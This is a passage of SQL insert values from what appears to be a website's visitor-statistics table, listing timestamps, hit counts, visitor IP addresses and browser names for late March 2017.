96551,1490778323,1,0,1,0,'40.77.167.33',''),(96552,1490778353,1,1,0,0,'91.196.178.65','chrome'),(96553,1490778854,1,1,0,0,'51.255.65.97','other'),(96554,1490779095,1,1,0,0,'91.196.178.162','chrome'),(96555,1490779422,1,1,0,0,'91.196.178.65','chrome'),(96556,1490779597,1,1,0,0,'217.69.133.6','other'),(96557,1490779787,1,1,0,0,'217.23.11.71','chrome'),(96558,1490779974,1,1,0,0,'91.196.178.69','chrome'),(96559,1490780543,1,1,0,0,'51.255.65.69','other'),(96560,1490780971,1,1,0,0,'207.46.13.110','other'),(96561,1490781122,1,1,0,0,'37.73.237.15','chrome'),(96562,1490781361,1,1,0,0,'37.53.246.101','opera'),(96563,1490781588,1,1,0,0,'217.23.11.65','chrome'),(96564,1490781889,1,1,0,0,'91.196.178.66','firefox'),(96565,1490782457,1,0,1,0,'66.249.66.84',''),(96566,1490783332,1,1,0,0,'91.196.178.162','chrome'),(96567,1490783387,1,1,0,0,'217.23.11.65','chrome'),(96568,1490783941,1,1,0,0,'92.113.7.3','chrome'),(96569,1490784089,1,1,0,0,'51.255.65.76','other'),(96570,1490784306,1,1,0,0,'91.196.178.162','chrome'),(96571,1490784744,1,1,0,0,'46.201.240.112','chrome'),(96572,1490785191,1,1,0,0,'217.23.11.65','chrome'),(96573,1490786725,1,1,0,0,'8.29.198.25','other'),(96574,1490786765,1,1,0,0,'91.196.178.69','chrome'),(96575,1490786987,1,1,0,0,'217.23.11.65','chrome'),(96576,1490787392,1,1,0,0,'91.196.178.68','firefox'),(96577,1490787570,1,1,0,0,'95.132.110.22','firefox'),(96578,1490787956,1,1,0,0,'91.196.178.69','chrome'),(96579,1490787986,1,1,0,0,'91.196.177.46','chrome'),(96580,1490788191,1,1,0,0,'46.133.67.202','firefox'),(96581,1490788661,1,0,1,0,'66.249.76.107',''),(96582,1490788727,1,1,0,0,'37.52.17.76','chrome'),(96583,1490788787,1,1,0,0,'217.23.11.65','chrome'),(96584,1490789453,1,0,1,0,'66.249.66.81',''),(96585,1490790587,1,1,0,0,'46.219.247.76','chrome'),(96586,1490791514,1,1,0,0,'91.196.178.69','chrome'),(96587,1490791953,1,1,0,0,'51.255.65.83','other'),(96588,1490792149,1,1,0,0,'91.196.177.46','chrome'),(96589,1490792173,1,1,0,0,'66.249.76.30','chrome'),(96590,1490792387,1,1,0,0,'46.219.247.76','chrome'),(96591,1490793085,1,1,0,0,'91.196.178.69','chrome'),(96592,1490793230,1,1,0,0,'51.255.65.45','other'),(96593,1490793261,1,1,0,0,'91.196.178.70','firefox'),(96594,1490793462,1,1,0,0,'92.113.188.237','chrome'),(96595,1490793950,1,1,0,0,'207.46.13.110','other'),(96596,1490794191,1,1,0,0,'46.219.247.76','chrome'),(96597,1490794292,1,1,0,0,'164.132.161.29','other'),(96598,1490794371,1,1,0,0,'92.113.188.237','chrome'),(96599,1490794414,1,1,0,0,'91.209.11.236','other'),(96600,1490795157,1,1,0,0,'92.112.109.230','chrome'),(96601,1490795353,1,0,1,0,'66.249.66.180',''),(96602,1490795601,1,1,0,0,'91.196.178.70','firefox'),(96603,1490795743,1,0,1,0,'66.249.76.108',''),(96604,1490796752,1,1,0,0,'66.249.66.177','chrome'),(96605,1490796832,1,1,0,0,'66.249.66.81','chrome'),(96606,1490797559,1,1,0,0,'8.29.198.27','other'),(96607,1490797893,1,1,0,0,'82.207.91.234','firefox'),(96608,1490798071,1,1,0,0,'91.209.11.236','other'),(96609,1490798409,1,1,0,0,'95.108.213.34','other'),(96610,1490798632,1,1,0,0,'66.249.76.108','chrome'),(96611,1490798682,1,1,0,0,'51.255.65.41','other'),(96612,1490799099,1,1,0,0,'91.196.179.33','firefox'),(96613,1490799210,1,1,0,0,'164.132.161.11','other'),(96614,1490799489,1,0,1,0,'66.249.76.28',''),(96615,1490799759,1,1,0,0,'164.132.161.79','other'),(96616,1490800057,1,1,0,0,'82.207.91.234','firefox'),(96617,1490800722,1,1,0,0,'180.76.15.147','other'),(96618,1490802583,1,0,1,0,'66.249.76.107',''),(96619,1490802710,1,1,0,0,'40.77.167.62','other'),(96620,1490805195,1,1,0,0,'66.249.76.30','chrome'),(96621,1490806280,1,1,0,0,'51.255.65.43','other'),(96622,1490806893,1,1,0,0,'91.209.11.236','other'),(96623,1490807411,1,1,0,0,'66.102.9.27','chrome'),(96624,1490808398,1,1,0,0,'8.29.198.25','other'),(96625,1490808568,1,0,1,0,'66.249.66.81',''),(96626,1490808725,1,1,0,0,'93.75.60.86','chrome'),(96627,1490809024,1,1,0,0,'51.255.65.23','other'),(96628,1490810007,1,1,0,0,'51.255.65.8','other'),(96629,1490810022,1,0,1,0,'207.46.13.93',''),(96630,1490810375,1,1,0,0,'157.55.39.134','other'),(96631,1490811441,1,0,1,0,'66.249.76.93',''),(96632,1490811633,1,0,1,0,'66.249.76.107',''),(96633,1490811762,1,1,0,0,'51.255.65.6','other'),(96634,1490811838,1,1,0,0,'157.55.39.134','other'),(96635,1490812128,1,0,1,0,'66.249.76.108',''),(96636,1490812591,1,1,0,0,'91.196.178.164','chrome'),(96637,1490813372,1,1,0,0,'207.46.13.93','other'),(96638,1490814182,2,2,0,0,'80.241.214.123','other'),(96639,1490815722,2,0,2,0,'66.249.76.108',''),(96640,1490816254,1,1,0,0,'46.211.200.132','chrome'),(96641,1490816963,1,1,0,0,'207.46.13.93','other'),(96642,1490817342,1,1,0,0,'164.132.161.37','other'),(96643,1490818931,1,0,1,0,'66.249.76.91',''),(96644,1490819257,1,1,0,0,'8.29.198.25','other'),(96645,1490820177,1,1,0,0,'51.255.65.57','other'),(96646,1490820905,1,1,0,0,'207.46.13.93','other'),(96647,1490820947,1,1,0,0,'51.255.65.49','other'),(96648,1490823366,1,1,0,0,'178.154.200.2','other'),(96649,1490826929,1,1,0,0,'51.255.65.37','other'),(96650,1490827511,1,1,0,0,'178.154.200.45','other'),(96651,1490827515,1,1,0,0,'5.255.253.28','other'),(96652,1490827520,1,1,0,0,'178.154.189.21','other'),(96653,1490827527,1,1,0,0,'95.108.179.15','other'),(96654,1490827609,1,1,0,0,'93.183.230.51','other'),(96655,1490830094,1,1,0,0,'8.29.198.26','other'),(96656,1490830803,1,1,0,0,'180.76.15.139','other'),(96657,1490832236,1,1,0,0,'78.26.185.86','chrome'),(96658,1490834958,1,1,0,0,'51.255.65.76','other'),(96659,1490835393,1,1,0,0,'164.132.161.30','other'),(96660,1490836440,1,0,1,0,'66.249.76.108',''),(96661,1490836744,1,1,0,0,'163.172.64.244','other'),(96662,1490837230,1,1,0,0,'66.249.66.177','chrome'),(96663,1490839341,1,1,0,0,'207.46.13.93','other'),(96664,1490839646,1,0,1,0,'66.249.66.87',''),(96665,1490840286,1,0,1,0,'66.249.76.109',''),(96666,1490840898,1,1,0,0,'51.255.65.43','other'),(96667,1490840944,1,1,0,0,'8.29.198.27','other'),(96668,1490843011,1,1,0,0,'207.46.13.195','other'),(96669,1490845303,1,1,0,0,'66.249.76.108','chrome'),(96670,1490846232,1,1,0,0,'51.255.65.44','other'),(96671,1490849014,1,1,0,0,'91.196.178.69','firefox'),(96672,1490850714,1,0,1,0,'66.249.76.109',''),(96673,1490851269,1,1,0,0,'163.172.64.249','other'),(96674,1490851574,1,1,0,0,'66.249.93.91','chrome'),(96675,1490851783,1,1,0,0,'8.29.198.27','other'),(96676,1490852229,1,0,1,0,'66.249.76.108',''),(96677,1490852629,2,2,0,0,'193.70.39.162','other'),(96678,1490852991,1,1,0,0,'91.196.178.70','chrome'),(96679,1490853999,2,2,0,0,'91.196.179.33','chrome'),(96680,1490854276,1,1,0,0,'91.196.178.69','chrome'),(96681,1490854446,1,1,0,0,'212.113.43.122','chrome'),(96682,1490854448,1,1,0,0,'79.137.181.205','chrome'),(96683,1490855783,1,0,1,0,'40.77.167.47',''),(96684,1490856242,1,1,0,0,'91.196.178.164','chrome'),(96685,1490856461,1,1,0,0,'82.207.91.234','firefox'),(96686,1490856782,1,1,0,0,'66.102.9.35','chrome'),(96687,1490858010,1,1,0,0,'91.196.177.46','firefox'),(96688,1490859061,1,1,0,0,'37.55.131.218','chrome'),(96689,1490860428,2,2,0,0,'91.196.178.69','firefox'),(96690,1490860971,1,1,0,0,'66.249.79.119','chrome'),(96691,1490860977,1,0,1,0,'66.249.76.108',''),(96692,1490861255,1,0,1,0,'66.249.76.109',''),(96693,1490862295,1,0,1,0,'66.249.79.115',''),(96694,1490862628,1,1,0,0,'91.196.177.46','firefox'),(96695,1490862635,1,1,0,0,'8.29.198.25','other'),(96696,1490862829,1,1,0,0,'91.196.178.65','firefox'),(96697,1490862864,1,1,0,0,'40.77.167.32','other'),(96698,1490863035,1,0,1,0,'66.249.76.91',''),(96699,1490863077,1,1,0,0,'82.207.91.234','firefox'),(96700,1490863338,2,2,0,0,'91.196.178.69','chrome'),(96701,1490863690,1,1,0,0,'91.196.177.26','chrome'),(96702,1490864781,1,1,0,0,'128.75.8.81','msie'),(96703,1490865089,1,1,0,0,'66.249.79.11','chrome'),(96704,1490865825,1,1,0,0,'95.132.92.154','firefox'),(96705,1490865926,1,1,0,0,'37.53.90.175','firefox'),(96706,1490866263,1,1,0,0,'37.55.151.36','chrome'),(96707,1490866312,1,1,0,0,'91.196.178.97','firefox'),(96708,1490866573,1,0,1,0,'40.77.167.47',''),(96709,1490866727,2,1,1,0,'40.77.167.32',''),(96710,1490866951,1,1,0,0,'91.196.178.134','firefox'),(96711,1490866993,1,1,0,0,'91.196.178.69','other'),(96712,1490867158,1,1,0,0,'66.249.79.119','chrome'),(96713,1490867328,2,2,0,0,'85.223.148.86','chrome'),(96714,1490867442,1,1,0,0,'91.196.178.65','firefox'),(96715,1490867764,1,0,1,0,'66.249.76.91',''),(96716,1490867793,1,0,1,0,'66.249.76.107',''),(96717,1490867819,1,1,0,0,'141.8.142.38','other'),(96718,1490868405,1,1,0,0,'178.92.73.67','other'),(96719,1490869234,1,1,0,0,'91.196.178.67','firefox'),(96720,1490869353,1,1,0,0,'95.221.221.173','msie'),(96721,1490870058,1,0,1,0,'66.249.76.91',''),(96722,1490870060,1,0,1,0,'66.249.79.11',''),(96723,1490870415,1,0,1,0,'66.249.79.19',''),(96724,1490870469,1,0,1,0,'66.249.79.123',''),(96725,1490870711,1,1,0,0,'51.255.65.53','other'),(96726,1490871031,1,0,1,0,'66.249.79.115',''),(96727,1490871415,1,1,0,0,'51.255.65.13','other'),(96728,1490871630,1,1,0,0,'164.132.161.86','other'),(96729,1490871847,1,1,0,0,'66.249.76.91','chrome'),(96730,1490871875,1,1,0,0,'66.249.79.11','chrome'),(96731,1490872665,1,1,0,0,'141.8.132.50','other'),(96732,1490872731,1,0,1,0,'66.249.79.119',''),(96733,1490873489,1,1,0,0,'8.29.198.27','other'),(96734,1490873736,1,0,1,0,'66.249.79.6',''),(96735,1490874588,1,1,0,0,'95.134.8.109','firefox'),(96736,1490874828,1,1,0,0,'51.255.65.83','other'),(96737,1490875705,1,1,0,0,'164.132.161.25','other'),(96738,1490875954,1,1,0,0,'46.48.13.161','chrome'),(96739,1490875959,1,1,0,0,'51.255.65.27','other'),(96740,1490876117,1,1,0,0,'164.132.161.16','other'),(96741,1490876257,1,1,0,0,'163.172.64.242','other'),(96742,1490876332,1,1,0,0,'51.255.65.19','other'),(96743,1490876387,1,1,0,0,'201.212.5.138','firefox'),(96744,1490876882,46,46,0,0,'208.43.225.85','other'),(96745,1490877348,1,1,0,0,'51.255.65.7','other'),(96746,1490877693,1,1,0,0,'178.54.194.9','chrome'),(96747,1490878850,1,1,0,0,'51.255.65.56','other'),(96748,1490879806,1,0,1,0,'66.249.76.109',''),(96749,1490880151,1,1,0,0,'51.255.65.10','other'),(96750,1490880271,1,1,0,0,'91.196.178.164','chrome'),(96751,1490880720,1,1,0,0,'91.196.178.134','firefox'),(96752,1490880835,1,1,0,0,'217.69.133.219','other'),(96753,1490881646,1,1,0,0,'80.254.155.43','chrome'),(96754,1490881662,1,1,0,0,'91.196.178.71','firefox'),(96755,1490882030,1,1,0,0,'51.255.65.63','other'),(96756,1490882111,1,1,0,0,'91.196.177.118','chrome'),(96757,1490882538,2,2,0,0,'173.208.157.186','other'),(96758,1490883255,1,1,0,0,'40.77.167.16','other'),(96759,1490883747,1,1,0,0,'51.255.65.66','other'),(96760,1490883862,1,0,1,0,'66.249.79.19',''),(96761,1490884224,1,1,0,0,'66.249.76.91','chrome'),(96762,1490884345,1,1,0,0,'8.29.198.26','other'),(96763,1490885200,1,0,1,0,'66.249.66.177',''),(96764,1490885244,1,1,0,0,'163.172.64.217','other'),(96765,1490885329,1,1,0,0,'51.255.65.11','other'),(96766,1490885372,1,1,0,0,'51.255.65.2','other'),(96767,1490885791,1,1,0,0,'207.46.13.211','other'),(96768,1490885847,1,1,0,0,'66.249.76.89','chrome'),(96769,1490886222,1,1,0,0,'163.172.64.223','other'),(96770,1490886505,1,1,0,0,'91.196.178.164','chrome'),(96771,1490886521,1,0,1,0,'66.249.76.109',''),(96772,1490886584,1,0,1,0,'66.249.66.84',''),(96773,1490886636,1,0,1,0,'66.249.76.91',''),(96774,1490886752,1,1,0,0,'51.255.65.17','other'),(96775,1490887110,1,0,1,0,'66.249.66.87',''),(96776,1490887138,1,0,1,0,'207.46.13.211',''),(96777,1490887264,1,1,0,0,'164.132.161.9','other'),(96778,1490887401,1,1,0,0,'163.172.64.216','other'),(96779,1490887747,1,1,0,0,'51.255.65.25','other'),(96780,1490888957,1,0,1,0,'66.249.76.107',''),(96781,1490889210,1,1,0,0,'51.255.65.66','other'),(96782,1490889344,1,1,0,0,'163.172.108.151','chrome'),(96783,1490889928,1,1,0,0,'40.77.167.16','other'),(96784,1490890254,1,1,0,0,'51.255.65.31','other'),(96785,1490890345,1,1,0,0,'180.76.15.149','other'),(96786,1490890542,1,1,0,0,'37.53.111.245','firefox'),(96787,1490890877,1,1,0,0,'95.132.2.184','chrome'),(96788,1490891435,1,1,0,0,'91.196.178.37','chrome'),(96789,1490891718,1,1,0,0,'164.132.161.15','other'),(96790,1490891768,1,1,0,0,'37.53.111.245','firefox'),(96791,1490891954,1,1,0,0,'51.255.65.21','other'),(96792,1490892087,1,1,0,0,'51.255.65.51','other'),(96793,1490892239,1,1,0,0,'37.53.228.164','chrome'),(96794,1490892866,1,1,0,0,'163.172.52.168','chrome'),(96795,1490893010,1,0,1,0,'207.46.13.211',''),(96796,1490893093,2,2,0,0,'91.196.178.165','chrome'),(96797,1490893684,1,1,0,0,'51.255.65.89','other'),(96798,1490894151,1,1,0,0,'5.1.18.87','chrome'),(96799,1490894215,1,1,0,0,'51.255.65.25','other'),(96800,1490895112,1,1,0,0,'164.132.161.50','other'),(96801,1490895197,1,1,0,0,'8.29.198.27','other'),(96802,1490895529,1,1,0,0,'163.172.64.244','other'),(96803,1490895572,1,0,1,0,'66.249.76.108',''),(96804,1490896084,1,1,0,0,'164.132.161.30','other'),(96805,1490896358,1,0,1,0,'66.249.76.93',''),(96806,1490896952,1,0,1,0,'66.249.66.177',''),(96807,1490897161,1,1,0,0,'95.132.2.47','firefox'),(96808,1490897228,1,1,0,0,'51.255.65.5','other'),(96809,1490898249,1,0,1,0,'66.249.66.84',''),(96810,1490898285,1,0,1,0,'66.249.76.89',''),(96811,1490898664,1,0,1,0,'66.249.66.81',''),(96812,1490898908,1,1,0,0,'91.196.178.130','chrome'),(96813,1490899034,1,1,0,0,'163.172.64.223','other'),(96814,1490899197,1,1,0,0,'163.172.64.181','other'),(96815,1490899242,1,0,1,0,'66.249.76.109',''),(96816,1490899432,1,1,0,0,'207.46.13.211','other'),(96817,1490900750,3,3,0,0,'141.8.142.15','other'),(96818,1490900754,4,4,0,0,'95.108.179.15','other'),(96819,1490900759,3,3,0,0,'95.108.213.34','other'),(96820,1490900999,1,0,1,0,'66.249.76.107',''),(96821,1490901407,1,1,0,0,'51.255.65.10','other'),(96822,1490901617,1,1,0,0,'164.132.161.74','other'),(96823,1490901840,1,1,0,0,'40.77.167.104','other'),(96824,1490901890,9,9,0,0,'5.9.111.70','other'),(96825,1490902118,1,1,0,0,'217.69.133.85','other'),(96826,1490902315,1,1,0,0,'164.132.161.25','other'),(96827,1490902655,1,1,0,0,'40.77.167.16','other'),(96828,1490902730,1,0,1,0,'66.249.76.93',''),(96829,1490902985,1,0,1,0,'66.249.76.107',''),(96830,1490903056,1,0,1,0,'66.249.76.91',''),(96831,1490903133,1,0,1,0,'66.249.76.89',''),(96832,1490903609,1,1,0,0,'40.77.167.32','other'),(96833,1490904742,1,1,0,0,'91.196.178.165','chrome'),(96834,1490905534,1,0,1,0,'66.249.76.109',''),(96835,1490906035,1,1,0,0,'8.29.198.26','other'),(96836,1490906306,1,1,0,0,'163.172.64.250','other'),(96837,1490906619,1,1,0,0,'51.255.65.28','other'),(96838,1490907260,1,1,0,0,'40.77.167.32','other'),(96839,1490907710,1,1,0,0,'51.255.65.25','other'),(96840,1490908264,1,1,0,0,'40.77.167.16','other'),(96841,1490908826,1,0,1,0,'66.249.66.81',''),(96842,1490908935,1,1,0,0,'180.76.15.21','other'),(96843,1490909690,1,1,0,0,'51.255.65.3','other'),(96844,1490910050,1,1,0,0,'141.170.226.192','chrome'),(96845,1490910065,1,1,0,0,'5.255.253.81','other'),(96846,1490910368,1,1,0,0,'40.77.167.32','other'),(96847,1490910401,1,1,0,0,'51.255.65.87','other'),(96848,1490910447,1,1,0,0,'207.46.13.211','other'),(96849,1490910465,1,0,1,0,'66.249.64.179',''),(96850,1490910618,1,0,1,0,'66.249.66.84',''),(96851,1490911899,1,0,1,0,'66.249.66.180',''),(96852,1490911908,2,2,0,0,'40.77.167.16','other'),(96853,1490912437,1,1,0,0,'217.69.133.70','other'),(96854,1490912858,1,1,0,0,'51.255.65.64','other'),(96855,1490916184,1,1,0,0,'66.249.76.107','chrome'),(96856,1490916731,1,1,0,0,'51.255.65.86','other'),(96857,1490916870,1,1,0,0,'8.29.198.25','other'),(96858,1490917070,1,1,0,0,'178.154.200.60','other'),(96859,1490917078,1,1,0,0,'93.158.152.79','other'),(96860,1490917082,1,1,0,0,'93.158.152.60','other'),(96861,1490917085,1,1,0,0,'95.108.179.21','other'),(96862,1490918524,1,1,0,0,'163.172.68.136','other'),(96863,1490920280,4,4,0,0,'51.254.214.202','other'),(96864,1490921916,1,1,0,0,'51.255.65.28','other'),(96865,1490922424,1,1,0,0,'51.255.65.96','other'),(96866,1490922662,1,1,0,0,'164.132.161.27','other'),(96867,1490925371,1,1,0,0,'5.9.147.133','other'),(96868,1490925990,1,1,0,0,'157.55.39.210','other'),(96869,1490926045,1,0,1,0,'66.249.76.91',''),(96870,1490926271,1,1,0,0,'51.255.65.43','other'),(96871,1490926733,1,1,0,0,'164.132.161.79','other'),(96872,1490927064,1,1,0,0,'163.172.108.151','chrome'),(96873,1490927197,1,1,0,0,'164.132.161.57','other'),(96874,1490927712,1,1,0,0,'8.29.198.25','other'),(96875,1490928141,1,1,0,0,'157.55.39.210','other'),(96876,1490928502,1,0,1,0,'66.249.76.109',''),(96877,1490928574,1,0,1,0,'66.249.76.107',''),(96878,1490929835,1,1,0,0,'164.132.161.34','other'),(96879,1490930093,1,1,0,0,'163.172.52.168','chrome'),(96880,1490930643,1,0,1,0,'66.249.76.93',''),(96881,1490930807,1,0,1,0,'207.46.13.11',''),(96882,1490931527,1,0,1,0,'66.249.66.84',''),(96883,1490931632,1,1,0,0,'217.69.133.220','other'),(96884,1490931698,1,0,1,0,'66.249.76.93',''),(96885,1490932133,1,1,0,0,'51.255.65.7','other'),(96886,1490932963,1,1,0,0,'163.172.64.180','other'),(96887,1490933007,1,1,0,0,'51.255.65.27','other'),(96888,1490933183,1,1,0,0,'163.172.64.232','other'),(96889,1490933596,1,1,0,0,'51.255.65.34','other'),(96890,1490934109,1,1,0,0,'51.255.65.21','other'),(96891,1490935179,1,1,0,0,'91.196.178.72','firefox'),(96892,1490935266,1,0,1,0,'66.249.66.81',''),(96893,1490935373,1,1,0,0,'51.255.65.46','other'),(96894,1490935518,1,1,0,0,'164.132.161.53','other'),(96895,1490936420,1,1,0,0,'91.196.178.72','firefox'),(96896,1490937059,1,1,0,0,'91.196.178.68','firefox'),(96897,1490938553,1,1,0,0,'8.29.198.25','other'),(96898,1490939022,1,1,0,0,'91.124.235.241','chrome'),(96899,1490939374,1,1,0,0,'164.132.161.29','other'),(96900,1490940523,1,1,0,0,'95.132.134.245','firefox'),(96901,1490940540,1,1,0,0,'141.8.142.15','other'),(96902,1490941129,1,0,1,0,'66.249.76.93',''),(96903,1490942141,1,1,0,0,'91.196.178.68','chrome'),(96904,1490942634,1,1,0,0,'92.113.191.21','chrome'),(96905,1490943095,1,1,0,0,'91.196.178.65','chrome'),(96906,1490943238,1,1,0,0,'66.249.93.91','chrome'),(96907,1490943803,1,1,0,0,'78.26.162.198','chrome'),(96908,1490943964,1,1,0,0,'91.196.177.26','chrome'),(96909,1490944051,1,1,0,0,'163.172.64.183','other'),(96910,1490944199,1,1,0,0,'51.255.65.48','other'),(96911,1490944249,1,1,0,0,'66.249.76.93','chrome'),(96912,1490944255,1,1,0,0,'66.249.66.183','chrome'),(96913,1490944335,1,1,0,0,'164.132.161.10','other'),(96914,1490945084,1,1,0,0,'66.102.9.27','chrome'),(96915,1490945322,1,1,0,0,'91.196.178.72','firefox'),(96916,1490945430,1,1,0,0,'51.255.65.60','other'),(96917,1490945860,1,0,1,0,'66.249.66.84',''),(96918,1490945925,1,0,1,0,'66.249.76.109',''),(96919,1490946294,1,1,0,0,'164.132.161.71','other'),(96920,1490947129,1,1,0,0,'66.102.9.40','chrome'),(96921,1490947560,1,0,1,0,'66.249.76.91',''),(96922,1490947596,1,1,0,0,'91.196.178.33','firefox'),(96923,1490947599,1,0,1,0,'66.249.76.107',''),(96924,1490947626,1,0,1,0,'66.249.76.89',''),(96925,1490947758,17,17,0,0,'144.76.39.34','other'),(96926,1490947967,1,1,0,0,'164.132.161.2','other'),(96927,1490948196,1,1,0,0,'137.74.167.224','chrome'),(96928,1490948197,1,1,0,0,'5.196.66.162','chrome'),(96929,1490948202,1,1,0,0,'94.242.246.23','chrome'),(96930,1490948981,1,1,0,0,'51.255.65.34','other'),(96931,1490949023,2,2,0,0,'192.151.148.50','msie'),(96932,1490949147,1,0,1,0,'66.249.66.81',''),(96933,1490949182,1,1,0,0,'51.255.65.82','other'),(96934,1490949359,1,1,0,0,'66.249.76.93','chrome'),(96935,1490949396,1,1,0,0,'8.29.198.27','other'),(96936,1490949699,1,1,0,0,'51.255.65.36','other'),(96937,1490950253,1,1,0,0,'82.207.38.91','chrome'),(96938,1490950268,1,1,0,0,'207.46.13.112','other'),(96939,1490950299,1,1,0,0,'5.255.253.43','other'),(96940,1490950469,1,1,0,0,'164.132.161.80','other'),(96941,1490950767,1,1,0,0,'91.196.177.26','chrome'),(96942,1490950912,1,1,0,0,'95.132.50.149','firefox'),(96943,1490951802,1,1,0,0,'91.196.177.26','firefox'),(96944,1490951945,1,1,0,0,'51.255.65.5','other'),(96945,1490952211,1,1,0,0,'51.255.65.39','other'),(96946,1490952714,1,1,0,0,'91.196.178.163','chrome'),(96947,1490952717,1,0,1,0,'66.249.76.89',''),(96948,1490952915,1,1,0,0,'91.209.11.236','other'),(96949,1490953100,1,1,0,0,'51.255.65.83','other'),(96950,1490953722,3,3,0,0,'91.196.178.69','chrome'),(96951,1490953919,1,1,0,0,'40.77.167.32','other'),(96952,1490953966,2,2,0,0,'213.108.45.110','chrome'),(96953,1490953993,1,0,1,0,'66.249.76.89',''),(96954,1490954518,1,1,0,0,'164.132.161.28','other'),(96955,1490954561,1,1,0,0,'51.255.65.67','other'),(96956,1490954679,1,1,0,0,'62.210.103.36','other'),(96957,1490954840,1,0,1,0,'66.249.76.109',''),(96958,1490954915,1,1,0,0,'178.137.82.154','chrome'),(96959,1490955003,1,1,0,0,'163.172.71.90','other'),(96960,1490955106,1,0,1,0,'66.249.66.183',''),(96961,1490955201,1,1,0,0,'217.69.133.217','other'),(96962,1490955260,1,0,1,0,'66.249.66.84',''),(96963,1490955735,1,1,0,0,'195.49.151.99','chrome'),(96964,1490956524,1,1,0,0,'66.249.76.108','chrome'),(96965,1490956832,1,1,0,0,'164.132.161.75','other'),(96966,1490957229,1,1,0,0,'51.255.65.17','other'),(96967,1490957913,1,1,0,0,'91.197.185.228','chrome'),(96968,1490958196,1,1,0,0,'91.196.178.133','chrome'),(96969,1490958248,1,1,0,0,'80.78.51.75','chrome'),(96970,1490958474,1,1,0,0,'163.172.64.192','other'),(96971,1490958533,1,1,0,0,'91.196.178.68','firefox'),(96972,1490958910,1,1,0,0,'91.196.178.69','msie'),(96973,1490959304,1,1,0,0,'91.196.178.165','chrome'),(96974,1490960219,1,1,0,0,'91.196.178.65','chrome'),(96975,1490960244,1,1,0,0,'8.29.198.26','other'),(96976,1490960294,1,1,0,0,'185.84.148.4','firefox'),(96977,1490960403,1,1,0,0,'46.133.153.42','chrome'),(96978,1490961246,1,1,0,0,'91.196.178.65','chrome'),(96979,1490961498,1,1,0,0,'163.172.64.182','other'),(96980,1490961889,1,1,0,0,'163.172.64.186','other'),(96981,1490962276,1,1,0,0,'164.132.161.49','other'),(96982,1490962441,1,1,0,0,'51.255.65.43','other'),(96983,1490963082,1,1,0,0,'89.28.201.171','chrome'),(96984,1490963826,1,1,0,0,'66.249.66.177','chrome'),(96985,1490963922,1,1,0,0,'66.249.66.183','chrome'),(96986,1490963940,1,1,0,0,'157.55.39.139','other'),(96987,1490964301,1,1,0,0,'46.211.96.35','opera'),(96988,1490964465,1,1,0,0,'51.255.65.87','other'),(96989,1490964698,1,1,0,0,'164.132.161.78','other'),(96990,1490964876,1,1,0,0,'37.55.194.209','chrome'),(96991,1490964963,1,1,0,0,'51.255.65.13','other'),(96992,1490964999,1,1,0,0,'178.92.143.51','chrome'),(96993,1490965897,1,1,0,0,'66.249.76.107','chrome'),(96994,1490965945,1,1,0,0,'66.249.66.180','chrome'),(96995,1490966648,1,1,0,0,'157.55.39.139','other'),(96996,1490966917,1,1,0,0,'164.132.161.50','other'),(96997,1490967248,1,0,1,0,'207.46.13.154',''),(96998,1490967545,1,1,0,0,'51.255.65.68','other'),(96999,1490967713,1,1,0,0,'51.255.65.39','other'),(97000,1490968106,1,1,0,0,'51.255.65.17','other'),(97001,1490968147,1,1,0,0,'164.132.161.95','other'),(97002,1490968607,1,1,0,0,'163.172.64.191','other'),(97003,1490969019,1,1,0,0,'51.255.65.82','other'),(97004,1490969246,1,1,0,0,'164.132.161.46','other'),(97005,1490969303,1,0,1,0,'66.249.76.108',''),(97006,1490969861,1,1,0,0,'164.132.161.82','other'),(97007,1490970173,1,1,0,0,'91.196.178.68','chrome'),(97008,1490970847,1,1,0,0,'88.99.195.39','other'),(97009,1490970942,1,1,0,0,'207.46.13.154','other'),(97010,1490971066,1,1,0,0,'164.132.161.41','other'),(97011,1490971086,1,1,0,0,'8.29.198.27','other'),(97012,1490971293,1,0,1,0,'66.249.76.109',''),(97013,1490971382,1,1,0,0,'51.255.65.24','other'),(97014,1490971565,1,1,0,0,'164.132.161.31','other'),(97015,1490971650,1,1,0,0,'163.172.64.235','other'),(97016,1490971819,1,1,0,0,'51.255.65.19','other'),(97017,1490971823,1,1,0,0,'46.166.199.137','firefox'),(97018,1490972261,1,1,0,0,'164.132.161.29','other'),(97019,1490972712,1,1,0,0,'51.255.65.94','other'),(97020,1490972738,1,1,0,0,'51.255.65.95','other'),(97021,1490972993,2,1,1,0,'157.55.39.139',''),(97022,1490973492,1,1,0,0,'164.132.161.13','other'),(97023,1490973552,1,1,0,0,'51.255.65.21','other'),(97024,1490974139,1,1,0,0,'91.196.178.167','chrome'),(97025,1490974162,1,1,0,0,'164.132.161.14','other'),(97026,1490974766,1,1,0,0,'163.172.64.180','other'),(97027,1490974944,1,1,0,0,'51.255.65.86','other'),(97028,1490974948,1,0,1,0,'66.249.76.108',''),(97029,1490975373,1,1,0,0,'51.255.65.4','other'),(97030,1490976671,1,0,1,0,'66.249.66.81',''),(97031,1490977496,1,1,0,0,'164.132.161.79','other'),(97032,1490977826,1,0,1,0,'207.46.13.11',''),(97033,1490978563,1,0,1,0,'66.249.76.91',''),(97034,1490979052,1,1,0,0,'163.172.64.251','other'),(97035,1490979277,1,1,0,0,'40.77.167.32','other'),(97036,1490980405,1,1,0,0,'51.255.65.76','other'),(97037,1490980904,1,1,0,0,'163.172.68.121','other'),(97038,1490981335,1,1,0,0,'207.46.13.11','other'),(97039,1490981770,1,1,0,0,'164.132.161.69','other'),(97040,1490981823,1,0,1,0,'66.249.76.91',''),(97041,1490981890,1,1,0,0,'164.132.161.83','other'),(97042,1490981920,1,1,0,0,'91.124.159.44','chrome'),(97043,1490981926,1,1,0,0,'8.29.198.27','other'),(97044,1490982813,1,1,0,0,'91.196.178.69','firefox'),(97045,1490983067,1,1,0,0,'180.76.15.160','other'),(97046,1490983230,1,1,0,0,'207.46.13.154','other'),(97047,1490984068,1,1,0,0,'164.132.161.21','other'),(97048,1490985749,1,0,1,0,'207.46.13.154',''),(97049,1490985928,1,1,0,0,'163.172.64.182','other'),(97050,1490986078,1,1,0,0,'163.172.64.238','other'),(97051,1490987573,1,1,0,0,'164.132.161.36','other'),(97052,1490988405,1,1,0,0,'40.77.167.32','other'),(97053,1490988660,1,1,0,0,'163.172.64.252','other'),(97054,1490988933,1,1,0,0,'207.46.13.11','other'),(97055,1490989621,1,1,0,0,'163.172.64.185','other'),(97056,1490990012,1,0,1,0,'66.249.66.180',''),(97057,1490990462,1,1,0,0,'51.255.65.29','other'),(97058,1490990714,1,1,0,0,'163.172.64.249','other'),(97059,1490991597,1,0,1,0,'66.249.76.107',''),(97060,1490992116,